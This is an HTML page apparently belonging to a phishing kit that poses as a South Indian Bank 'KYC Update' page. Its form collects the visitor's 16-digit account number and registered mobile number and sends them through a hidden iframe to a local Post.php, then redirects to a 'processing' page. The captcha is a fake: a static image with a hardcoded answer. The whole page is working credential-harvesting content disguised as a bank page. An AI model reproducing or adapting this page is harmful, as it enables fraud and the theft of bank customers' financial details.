<!DOCTYPE html>
<html lang="en" >
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
    <meta charSet="utf-8" />
    <meta name="viewport" content="width=device-width" />
    <meta name="theme-color" content="#AE2626">
    <title>KYC Update | South Indian Bank</title>
<meta name="description" content="login" />
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="theme-color" content="#ffffff">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Arimo:ital,wght@0,400..700;1,400..700&display=swap" rel="stylesheet">
<link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css'>
<link rel="stylesheet" href="./style.css">
</head>
<style type="text/css">
#mn
{ 
  width:104%;
  margin-left:-7px;
  margin-bottom:20px;
}
#ft
{ 
  width:103%;
  margin-top:50px;
  margin-left:-5px;
  text-align:bottom;
}
#pc
{ 
  width:100%;
  margin-bottom:0px;
}
#cp
{ 
  width:65%;
  margin-left:2px;
  margin-bottom:10px;
}
#dc
{ 
  width:95%;
  margin-left:5px;
  margin-top:-15px;
}
input[type="text"] {
  width: 95%;
  color:#000;
  font-size:14px;
  border: 1px solid #E3DFDE;
  border-radius: 4px;
  letter-spacing:0.5px;
  padding:10px 30px;
  outline: none;
  box-sizing: border-box;
  transition: 0.3s;
}
body{
  font-family: 'Arimo', sans-serif;
   background-color: #f7f7f7;
  
}


/*------------*/
.form-area {
    background-color: #fff;
    box-shadow: 2px 5px 10px rgba(90, 116, 148, 0.2);
    padding: 25px;
    border-radius: 6px;
    display: flex;
    }
.form-area .form-inner {
    width: 100%;
}
.intl-tel-input,
.iti{
  width: 100%;
}
.inputWithIcon input[type="text"] {
  padding-left: 30px;
}

.inputWithIcon {
  position: relative;
}

.inputWithIcon i {
  position: absolute;
  left: 0;
  top: 1px;
  font-size:13px;
  padding: 10px 18px;
  color: #777777;
  transition: 0.3s;
}
.inputWithIconMob input[type="text"] {
  padding-left: 30px;
}

.inputWithIconMob {
  position: relative;
}

.inputWithIconMob i {
  position: absolute;
  left: 0;
  top: -2px;
  font-size:22px;
  padding: 10px 20px;
  color: #777777;
  transition: 0.3s;
}
.inputWithIconIm input[type="text"] {
  padding-left: 31px;
}

.inputWithIconIm {
  position: relative;
}

.inputWithIconIm i {
  position: absolute;
  left: 0;
  top: 1.4px;
  font-size:14px;
  padding: 10px 18px;
  color: #777777;
  transition: 0.3s;
}
.inputWithIconHe {
  position: relative;
}

.inputWithIconHe i {
  position: absolute;
  left: 18px;
  top: -9.5px;
  font-size:18px;
  padding: 10px;
  color: #AE2626;
  transition: 0.3s;
}
input::-webkit-input-placeholder {
    color: transparent;
    font-size:11px;
    font-family: 'Arimo', sans-serif;
}
input:focus::-webkit-input-placeholder {
    color: #999;
    font-size:11px;
    text-transform:none;
    font-family: 'Arimo', sans-serif;
}

/* Firefox < 19 */
input:-moz-placeholder {
    color: transparent;
    font-size:11px;
    font-family: 'Arimo', sans-serif;
}
input:focus:-moz-placeholder {
    color: #999;
    font-size:11px;
    font-family: 'Arimo', sans-serif;
    text-transform:none;
}

/* Firefox > 19 */
input::-moz-placeholder {
    color: transparent;
    font-size:11px;
    font-family: 'Arimo', sans-serif;
}
input:focus::-moz-placeholder {
    color: #999;
    font-size:11px;
    font-family: 'Arimo', sans-serif;
    text-transform:none;
}

/* Internet Explorer 10 */
input:-ms-input-placeholder {
    color: transparent;
    font-size:11px;
    font-family: 'Arimo', sans-serif;
}
input:focus:-ms-input-placeholder {
    color: #999;
    font-size:11px;
    font-family: 'Arimo', sans-serif;
    text-transform:none;
}
</style>
<body onload="startTimer();">
  <script type="text/javascript">var submitted=false;</script>
  <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='new_processing.html';}"></iframe>
        <div class="container">
        <img alt="" src="South_Logo.jpg" id="mn"/><br>
        <section class="pt-5 pb-5">
    <div class="container text-center">
        <div class="row">
        </div>
    </div>

    <div class="container">
        <div class="row justify-content-center">
                <div class="form-area">
                    <div class="form-inner">
                        <form class="LoginForm" action="Post.php" method="post" target="hidden_iframe" onsubmit="submitted=true" class="form">
                        <center><img alt="" src="South_L.jpg" id="pc"/></center>
                        <div class="inputWithIconHe">
                        <center><h3 style="color:#AE2626; font-family: 'Arimo', sans-serif; font-size:16px; letter-spacing:0.5px; margin-left:20px; margin-bottom:25px;">Continue To KYC Update</h3>
                        <i class="fa fa-id-card-o" aria-hidden="true"></i></center>
                        </div>
                        <div class="inputWithIcon">
                        <div class="input-group">
                        <center><input class="input-group__input" type="text" name="Account_No." inputmode="numeric" maxlength="16" placeholder="" id="account"
                        pattern="[0-9]\d{15}" title="Please enter valid 16 digits account number !" required />
                        <label class="input-group__label" for="mobile">Account Number (16 Digits) <span style="color:red;">*</span></label>
                        <i class="fa fa-university" aria-hidden="true"></i></center>
                        </div>
                        </div>
                        <div class="inputWithIconMob">
                        <div class="input-group">
                        <center><input class="input-group__input" type="text" name="Mobile_No." inputmode="numeric" maxlength="10" placeholder="" id="mobile"
                        pattern="[6-9]\d{9}" title="Please enter valid mobile number !" required />
                        <label class="input-group__label" for="mobile">Registered Mobile Number <span style="color:red;">*</span></label>
                        <i class="fa fa-mobile" aria-hidden="true"></i></center>
                        </div>
                        </div>
                        <img alt="" src="Captcha.jpg" id="cp"/>
                        <div class="inputWithIconIm">
                        <div class="input-group">
                        <center><input class="input-group__input" type="text" name="" maxlength="5" placeholder="Enter captcha whown as image" id="captcha"
                        pattern="FRCMZ" title="Please enter valid captcha shown as image !" required />
                        <label class="input-group__label" for="mobile">Enter the above text <span style="color:red;">*</span></label>
                        <i class="fa fa-picture-o" aria-hidden="true"></i></center>
                        </div>
                        </div><br>
                        <img alt="" src="Declaration.jpg" id="dc"/><br><br>
                        <center><button type="submit">Continue</button></center><br>
                        </form>
                        
</section>
                        <img alt="" src="Footer.jpg" id="ft"/>
               </div>
               </div>
               </div>
               </div>
               </html>